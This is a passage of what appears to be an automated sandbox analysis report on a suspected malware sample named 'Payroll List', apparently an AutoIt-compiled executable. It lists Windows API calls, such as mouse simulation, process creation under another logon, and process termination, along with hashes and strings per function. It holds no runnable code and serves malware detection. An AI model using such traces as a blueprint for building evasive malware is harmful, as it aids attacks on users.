                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 2537439066-0
                                                                    • Opcode ID: af2aefa4ee8bfb31890311ad671b0d670adaa40e100f9fbb0ce1206f9c8b4d0a
                                                                    • Instruction ID: 3da8e98873b76950c6190e6639f856e65ccff7b4b83a8ce659e6b514ba24d247
                                                                    • Opcode Fuzzy Hash: af2aefa4ee8bfb31890311ad671b0d670adaa40e100f9fbb0ce1206f9c8b4d0a
                                                                    • Instruction Fuzzy Hash: 72316F71900205EBDB10EFA4DC85EAEBBB8FF95710F1480A9F905AB246D774DA51CBA0
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,001777F4,?,?,00000000,00000001), ref: 00179B53
                                                                      • Part of subcall function 00176544: GetWindowRect.USER32(?,?), ref: 00176557
                                                                    • GetDesktopWindow.USER32 ref: 00179B7D
                                                                    • GetWindowRect.USER32(00000000), ref: 00179B84
                                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00179BB6
                                                                      • Part of subcall function 00167A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00167AD0
                                                                    • GetCursorPos.USER32(?), ref: 00179BE2
                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00179C44
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                    • String ID:
                                                                    • API String ID: 4137160315-0
                                                                    • Opcode ID: c9eb7ba1b25c09376cb0ccddbea86b0f5daa338613241f67963619ad0813a587
                                                                    • Instruction ID: 43e751ca4f29c6310c97133da55d777588c68747d3c9494898f050edda8a787d
                                                                    • Opcode Fuzzy Hash: c9eb7ba1b25c09376cb0ccddbea86b0f5daa338613241f67963619ad0813a587
                                                                    • Instruction Fuzzy Hash: 6731CF72504305ABD710DF54EC49F9AB7E9FF89314F00091AF589D7191DB31EA48CB92
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0015AFAE
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0015AFB5
                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0015AFC4
                                                                    • CloseHandle.KERNEL32(00000004), ref: 0015AFCF
                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0015AFFE
                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 0015B012
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                    • String ID:
                                                                    • API String ID: 1413079979-0
                                                                    • Opcode ID: cd2f253dd01a6c21c061146e1cec0a5b2e2115f96d86f861994a7376892e8f20
                                                                    • Instruction ID: 721c896b58e8d8bbc262d42abf4142e0ba557fb145cf23daaedfa578f2b7de72
                                                                    • Opcode Fuzzy Hash: cd2f253dd01a6c21c061146e1cec0a5b2e2115f96d86f861994a7376892e8f20
                                                                    • Instruction Fuzzy Hash: D5218BB214420DEFCF028FA4ED09FAE7BA9EF45305F044115FE12AA561C3768D68EB61
                                                                    APIs
                                                                      • Part of subcall function 0013AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0013AFE3
                                                                      • Part of subcall function 0013AF83: SelectObject.GDI32(?,00000000), ref: 0013AFF2
                                                                      • Part of subcall function 0013AF83: BeginPath.GDI32(?), ref: 0013B009
                                                                      • Part of subcall function 0013AF83: SelectObject.GDI32(?,00000000), ref: 0013B033
                                                                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0018EC20
                                                                    • LineTo.GDI32(00000000,00000003,?), ref: 0018EC34
                                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0018EC42
                                                                    • LineTo.GDI32(00000000,00000000,?), ref: 0018EC52
                                                                    • EndPath.GDI32(00000000), ref: 0018EC62
                                                                    • StrokePath.GDI32(00000000), ref: 0018EC72
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                    • String ID:
                                                                    • API String ID: 43455801-0
                                                                    • Opcode ID: 2c7482715abfd3d054c8c07b7cdded8b3ef15710dd181d5848e7ac54c5722daf
                                                                    • Instruction ID: ba6b0eede4d24960829ec5e15343af6b322a31258638a90cbaff8aac4be4f79f
                                                                    • Opcode Fuzzy Hash: 2c7482715abfd3d054c8c07b7cdded8b3ef15710dd181d5848e7ac54c5722daf
                                                                    • Instruction Fuzzy Hash: C6111B7240014DBFEF029F90ED88EEA7F6DEF09350F048112BE0989560D7719E95DBA0
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 0015E1C0
                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0015E1D1
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0015E1D8
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0015E1E0
                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0015E1F7
                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0015E209
                                                                      • Part of subcall function 00159AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00159A05,00000000,00000000,?,00159DDB), ref: 0015A53A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDevice$ExceptionRaiseRelease
                                                                    • String ID:
                                                                    • API String ID: 603618608-0
                                                                    • Opcode ID: 7eddf0cc109f34700736b3fbdee8c41a03a12eacb7c5729c954475f3ab0cc22c
                                                                    • Instruction ID: e9d6b4f9803a50a46ff50be676322fa1d8ed36bc2e33e6e28b3dba7433a4644c
                                                                    • Opcode Fuzzy Hash: 7eddf0cc109f34700736b3fbdee8c41a03a12eacb7c5729c954475f3ab0cc22c
                                                                    • Instruction Fuzzy Hash: 400184B5E40714BFEB109FA59C45B5EBFB8EB49351F004066FE09AB690D6709D01CFA0
                                                                    APIs
                                                                    • __init_pointers.LIBCMT ref: 00147B47
                                                                      • Part of subcall function 0014123A: __initp_misc_winsig.LIBCMT ref: 0014125E
                                                                      • Part of subcall function 0014123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00147F51
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00147F65
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00147F78
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00147F8B
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00147F9E
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00147FB1
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00147FC4
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00147FD7
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00147FEA
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00147FFD
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00148010
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00148023
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00148036
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00148049
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0014805C
                                                                      • Part of subcall function 0014123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0014806F
                                                                    • __mtinitlocks.LIBCMT ref: 00147B4C
                                                                      • Part of subcall function 00147E23: InitializeCriticalSectionAndSpinCount.KERNEL32(001DAC68,00000FA0,?,?,00147B51,00145E77,001D6C70,00000014), ref: 00147E41
                                                                    • __mtterm.LIBCMT ref: 00147B55
                                                                      • Part of subcall function 00147BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00147B5A,00145E77,001D6C70,00000014), ref: 00147D3F
                                                                      • Part of subcall function 00147BBD: _free.LIBCMT ref: 00147D46
                                                                      • Part of subcall function 00147BBD: DeleteCriticalSection.KERNEL32(001DAC68,?,?,00147B5A,00145E77,001D6C70,00000014), ref: 00147D68
                                                                    • __calloc_crt.LIBCMT ref: 00147B7A
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00147BA3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                    • String ID:
                                                                    • API String ID: 2942034483-0
                                                                    • Opcode ID: e7dfe620746c7bd78d25837b8c3f5e06c9a9d4107e3fafeede49a3b35683dc9f
                                                                    • Instruction ID: c81846a00ee2ef8d123ab5195319ab87fcd34131a78cf411b29f3214ceb4d431
                                                                    • Opcode Fuzzy Hash: e7dfe620746c7bd78d25837b8c3f5e06c9a9d4107e3fafeede49a3b35683dc9f
                                                                    • Instruction Fuzzy Hash: 82F0E93211E7121DE6347B34BC07A5B27C4DF12734B200B9AF964D54F2FF20888145A1
                                                                    APIs
                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0012281D
                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00122825
                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00122830
                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0012283B
                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00122843
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0012284B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual
                                                                    • String ID:
                                                                    • API String ID: 4278518827-0
                                                                    • Opcode ID: eed0f7f1a260ed539e39c85eb1c6eadd6b11ebaed7f826121a2b19b4c87e710d
                                                                    • Instruction ID: 229e66c8567fcd513e82a5faa9b8d3d0395e5d7e3ffbaf7f99766c090ca35d52
                                                                    • Opcode Fuzzy Hash: eed0f7f1a260ed539e39c85eb1c6eadd6b11ebaed7f826121a2b19b4c87e710d
                                                                    • Instruction Fuzzy Hash: CF0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                    • String ID:
                                                                    • API String ID: 1423608774-0
                                                                    • Opcode ID: 2e8deb414f9eea46216f9975795a61de831a9c05749ceecb3ac64fef74b8f515
                                                                    • Instruction ID: e6f585f7e6371cfc1434bc91dfac542e1f8722e40a863b3ae828422c278e1c98
                                                                    • Opcode Fuzzy Hash: 2e8deb414f9eea46216f9975795a61de831a9c05749ceecb3ac64fef74b8f515
                                                                    • Instruction Fuzzy Hash: 6601A436102621ABDB151BA4FC48EFF77ADFF89702B44042AF50397CA0DB749850DB50
                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00167C07
                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00167C1D
                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00167C2C
                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00167C3B
                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00167C45
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00167C4C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                    • String ID:
                                                                    • API String ID: 839392675-0
                                                                    • Opcode ID: 949897f1df217cf0e8466bc2dc7a02df592f3b05c7b52bea293a0d7c4be3427d
                                                                    • Instruction ID: 94dca15a4964150e3a956f31fa774029f012f89fdd5779320145d15ea2098904
                                                                    • Opcode Fuzzy Hash: 949897f1df217cf0e8466bc2dc7a02df592f3b05c7b52bea293a0d7c4be3427d
                                                                    • Instruction Fuzzy Hash: 55F03A72241958BBE7215B62AC0EEEF7B7CEFC7B15F040018FA0691891E7A05A81C6B5
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00169A33
                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,00195DEE,?,?,?,?,?,0012ED63), ref: 00169A44
                                                                    • TerminateThread.KERNEL32(?,000001F6,?,?,?,00195DEE,?,?,?,?,?,0012ED63), ref: 00169A51
                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00195DEE,?,?,?,?,?,0012ED63), ref: 00169A5E
                                                                      • Part of subcall function 001693D1: CloseHandle.KERNEL32(?,?,00169A6B,?,?,?,00195DEE,?,?,?,?,?,0012ED63), ref: 001693DB
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00169A71
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,00195DEE,?,?,?,?,?,0012ED63), ref: 00169A78
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                    • String ID:
                                                                    • API String ID: 3495660284-0
                                                                    • Opcode ID: eca69a7614d60a70a673592d68703311dce366d592cb66740ae92293e6bae2b0
                                                                    • Instruction ID: 479088fa48d6cf14e7919cdcc52fc1781e363d54f6f0f7c6a7ff72a0b6d47239
                                                                    • Opcode Fuzzy Hash: eca69a7614d60a70a673592d68703311dce366d592cb66740ae92293e6bae2b0
                                                                    • Instruction Fuzzy Hash: 76F0E276141A01ABD7111BA4FC8CEEF3779FF86302B440026F10395CA0CB789850DB50
                                                                    APIs
                                                                      • Part of subcall function 0013F4EA: std::exception::exception.LIBCMT ref: 0013F51E
                                                                      • Part of subcall function 0013F4EA: __CxxThrowException@8.LIBCMT ref: 0013F533
                                                                    • __swprintf.LIBCMT ref: 00121EA6
                                                                    Strings
                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00121D49
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                    • API String ID: 2125237772-557222456
                                                                    • Opcode ID: c72eaf0b4be9728b05ddadb588cf653d8a76ab9c6ee411d902a1035574872ed2
                                                                    • Instruction ID: e71d1656ce8016da113a625475823c5b38c402aa0e409b3beb104ca507343737
                                                                    • Opcode Fuzzy Hash: c72eaf0b4be9728b05ddadb588cf653d8a76ab9c6ee411d902a1035574872ed2
                                                                    • Instruction Fuzzy Hash: A3919D71604221AFDB24EF24E895C6EB7F4BFA5700F01491DF895972A1DB70ED14CB92
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 0017B006
                                                                    • CharUpperBuffW.USER32(?,?), ref: 0017B115
                                                                    • VariantClear.OLEAUT32(?), ref: 0017B298
                                                                      • Part of subcall function 00169DC5: VariantInit.OLEAUT32(00000000), ref: 00169E05
                                                                      • Part of subcall function 00169DC5: VariantCopy.OLEAUT32(?,?), ref: 00169E0E
                                                                      • Part of subcall function 00169DC5: VariantClear.OLEAUT32(?), ref: 00169E1A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                    • API String ID: 4237274167-1221869570
                                                                    • Opcode ID: 73837905c053298bbc347d77c2b3b7fea2a5dcc272ca2e74c7ea9118f2826ff4
                                                                    • Instruction ID: 1ab8fbc13ebba7349b1f80bdfc674558393c9cd0bbb1c395f5798562650292a2
                                                                    • Opcode Fuzzy Hash: 73837905c053298bbc347d77c2b3b7fea2a5dcc272ca2e74c7ea9118f2826ff4
                                                                    • Instruction Fuzzy Hash: 40917A706083019FCB14DF24D495A5ABBF4BF99704F04886EF89A9B362DB31E945CB92
                                                                    APIs
                                                                      • Part of subcall function 0013C6F4: _wcscpy.LIBCMT ref: 0013C717
                                                                    • _memset.LIBCMT ref: 00165438
                                                                    • GetMenuItemInfoW.USER32(?), ref: 00165467
                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00165513
                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0016553D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                    • String ID: 0
                                                                    • API String ID: 4152858687-4108050209
                                                                    • Opcode ID: 2e962f8c4bad9014b91fdc0ecee6e57c5fb2bf67c9a98018d0b8fa1489575bda
                                                                    • Instruction ID: 7e7f2774a4a4d95d96d9822865bde57fa4295de602d6b5520681b02d7b3956a4
                                                                    • Opcode Fuzzy Hash: 2e962f8c4bad9014b91fdc0ecee6e57c5fb2bf67c9a98018d0b8fa1489575bda
                                                                    • Instruction Fuzzy Hash: 14510371604B019BD7149F28CC496AFBBEAAF95754F04062EF896D3290EB70CD64CB52
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0016027B
                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 001602B1
                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 001602C2
                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00160344
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                    • String ID: DllGetClassObject
                                                                    • API String ID: 753597075-1075368562
                                                                    • Opcode ID: 5952f20c9fa1ac6239f852609cf7d78f4b576b66c3ebb9ce57fb2ab9c488e614
                                                                    • Instruction ID: 0e7ae0cf08fb82cdaa0c16be6de1b94d5d148bf335dbff560d241886dab9e4a6
                                                                    • Opcode Fuzzy Hash: 5952f20c9fa1ac6239f852609cf7d78f4b576b66c3ebb9ce57fb2ab9c488e614
                                                                    • Instruction Fuzzy Hash: EF4149B1600604AFDB16CF64CC84B9B7BB9FF49316B1580A9E909DF306D7B1DA54CBA0
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00165075
                                                                    • GetMenuItemInfoW.USER32 ref: 00165091
                                                                    • DeleteMenu.USER32(00000004,00000007,00000000), ref: 001650D7
